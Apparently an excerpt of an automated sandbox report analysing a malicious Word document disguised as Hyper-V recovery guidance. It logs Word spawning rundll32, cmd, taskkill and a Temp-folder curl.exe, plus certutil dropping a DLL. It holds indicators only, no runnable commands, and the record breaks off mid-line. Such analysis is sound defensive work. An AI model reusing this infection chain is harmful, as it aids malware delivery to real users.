Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,_Smanip, 16_2_00007FFD92BEE600
Source: C:\Users\user\AppData\Local\Temp\curl.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Windows\SysWOW64\certutil.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exe API coverage: 5.4 %
Source: C:\Users\user\AppData\Local\Temp\curl.exe API coverage: 9.1 %
Source: C:\Windows\System32\rundll32.exe TID: 6552 Thread sleep count: 82 > 30
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92C0B230 _Bitmask_includes,operator&=,_Bitmask_includes,_Bitmask_includes,operator&=,_Bitmask_includes,GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,operator&=,std::_Fs_file::_Fs_file,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock, 16_2_00007FFD92C0B230
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92C0B1C0 __std_fs_close_handle,FindFirstFileExW,GetLastError, 16_2_00007FFD92C0B1C0
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92BF18C0 FindFirstFileW,new,delete,delete,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,delete,delete,delete,FindNextFileW,FindClose,delete,delete, 16_2_00007FFD92BF18C0
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92CCDD10 type_info::_name_internal_method,FindFirstFileExW,Concurrency::details::_Scheduler::_Scheduler,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,FindNextFileW,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12, 16_2_00007FFD92CCDD10
Source: C:\Windows\System32\rundll32.exe Code function: 16_2_00007FFD92C95E80 GetSystemInfo, 16_2_00007FFD92C95E80
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Colors\
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\
Source: document.xml Binary or memory string: </w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Hyper-V Settings</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: document.xml Binary or memory string: </w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Hyper-V settings</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: rundll32.exe, 00000010.00000002.5553191262.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000003.4258778994.0000027F6C3D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259308541.0000027F6C3D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: document.xml Binary or memory string: </w:t></w:r><w:hyperlink r:id="rId9" w:tgtFrame="_self" w:history="1"><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="146CAC"/><w:u w:val="single"/></w:rPr><w:t>https://go.microsoft.com/fwlink/?linkid=2280386</w:t></w:r></w:hyperlink><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>. In this document, we include detailed recovery steps for Windows client, servers, and OS's hosted on Hyper-V. The two repair options are as follows:</w:t></w:r></w:p><w:p w14:paraId="49DFB7AB" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="5"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Recover from WinPE</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: curl.exe, 0000000D.00000003.2188986234.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.2189060757.00000000033F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
Source: document.xml Binary or memory string: </w:t></w:r></w:p><w:p w14:paraId="70D69DE5" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Steps to Recover Hyper-V virtual machines</w:t></w:r></w:p><w:p w14:paraId="74745A04" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="10"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>On an impacted virtual machine, add a DVD Drive under
Source: rundll32.exe, 00000010.00000003.2451014222.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2540593407.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2416797193.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2550439735.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2500142406.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2430247545.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2257877794.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2479616705.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2461554328.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2429834267.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 